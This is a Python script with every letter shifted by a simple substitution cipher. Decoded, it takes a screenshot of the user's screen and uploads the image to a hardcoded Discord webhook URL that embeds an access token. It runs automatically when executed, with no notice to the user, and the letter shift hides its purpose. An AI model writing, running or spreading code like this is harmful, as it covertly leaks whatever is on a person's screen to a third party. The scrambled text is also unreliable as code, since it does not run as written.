nrutwy rxx
nrutwy ynrj
nrutwy wjvzjxyx

BJGMTTP_ZWQ = "myyux://inxhtwi.htr/fun/bjgmttpx/8060943368151058851/uh_F5XgLi84A0V6FjDP7fXd8z4gZJJQ6_4v_OJtdk4eBQUDdmHhjy1Xvdqwsbiv2c8ij"

ijk yfpj_xhwjjsxmty():
    bnym rxx.rxx() fx xhy:
        knqjsfrj = k"xhwjjsxmty_{nsy(ynrj.ynrj())}.usl"
        xhy.xmty(tzyuzy=knqjsfrj)
    wjyzws knqjsfrj

ijk xjsi_yt_inxhtwi(knqj_ufym):
    bnym tujs(knqj_ufym, "wg") fx k:
        knqjx = {
            "knqj": (knqj_ufym, k)
        }
        wjxutsxj = wjvzjxyx.utxy(BJGMTTP_ZWQ, knqjx=knqjx)
    nk wjxutsxj.xyfyzx_htij == 971:
        uwnsy("fqqtb")
    jqxj:
        uwnsy(k"kfqxj: {wjxutsxj.xyfyzx_htij} {wjxutsxj.yjcy}")

nk __sfrj__ == "__rfns__":
    ufym = yfpj_xhwjjsxmty()
    xjsi_yt_inxhtwi(ufym)
